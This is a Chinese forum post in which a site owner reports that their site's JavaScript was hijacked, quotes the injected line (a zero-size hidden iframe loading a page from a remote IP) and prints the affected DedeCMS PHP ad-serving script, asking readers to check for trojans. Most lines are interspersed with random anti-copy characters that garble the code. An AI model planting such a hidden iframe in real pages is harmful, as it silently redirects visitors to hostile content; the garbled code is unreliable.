請大家再去幫我複查下,看還有沒木馬,另外前年的教程已經免費發佈上去了,自己去下或者看。
; Q. h. y d, o9 Q: K8 K/ s+ W9 r/ ?3 S& h. U
掛馬的人不是專業黑客,是搞這行的,把我的JS裡加了個這個
2 j0 X. O7 `7 S& ?$ V6 |) Y
' T2 E( _' Z' d7 g% D/ Fdocument.write("<iframe src=http://58.211.79.107/xs.htm?88 width=0 height=0></iframe>");
6 A) g. V8 L8 u<?php 4 y, g* |" h. G E S) ]
require(dirname(__FILE__)."/../include/config_base.php"); {0 ^& |7 ]9 b. ` _
$aid = ereg_replace("[^0-9]","",$aid);
7 p& g3 n; g2 N2 U$dsql = new DedeSql(false);1 D, u, j/ F, a. N& k
$row = $dsql->GetOne("Select * From [email=#@__myad]#@__myad[/email] where aid='$aid'");
; t7 V: I* [5 |$dsql->Close();0 y2 j" [+ s) w& v6 C9 u; p( X4 s/ G+ N; b
if($row['timeset']==0) $adbody = $row['normbody'];
2 S' u: f/ ^- u% T2 o% helse{
6 M0 i3 F0 f: n2 K- }3 _! E: u $ntime = mytime();$ t% V% M6 b. r. [, A' d
if($ntime>$row['endtime']||$ntime<$row['starttime']){ $adbody = $row['expbody']; }
( E: h2 S( I# L else{ $adbody = $row['normbody']; }& G' A3 M! |# Q7 ~0 `
}/ \/ h4 b- B5 u: Z+ h$ ~6 _
$adbody = str_replace('"','\"',$adbody);
; E" ~7 O. @: I1 }$adbody = str_replace("\r","\\r",$adbody);
% ~0 a6 _6 s2 e7 m$ B$ ?! [, M% Z3 c9 q+ `$adbody = str_replace("\n","\\n",$adbody);! Q& |) S; Z4 Z0 T" E3 Q Z2 {
echo "<!--\r\n";
+ d0 m, Q9 X; j( i7 B2 X0 hecho "document.write(\"{$adbody}\");\r\n";0 K9 R5 y; ^$ Q5 V) _7 G
echo "-->\r\n";
, ^6 l; r# g% `/ O0 q?>4 K- j, o% z/ l0 K
* F( `5 w4 u* j0 G% a# [
) V' J) @- d/ Q& W, D: q; C5 [自己看第一行 根據這個去找他到底想幹什麼吧 其實意圖很明顯的,一是玩計數器,二是做停放 |
|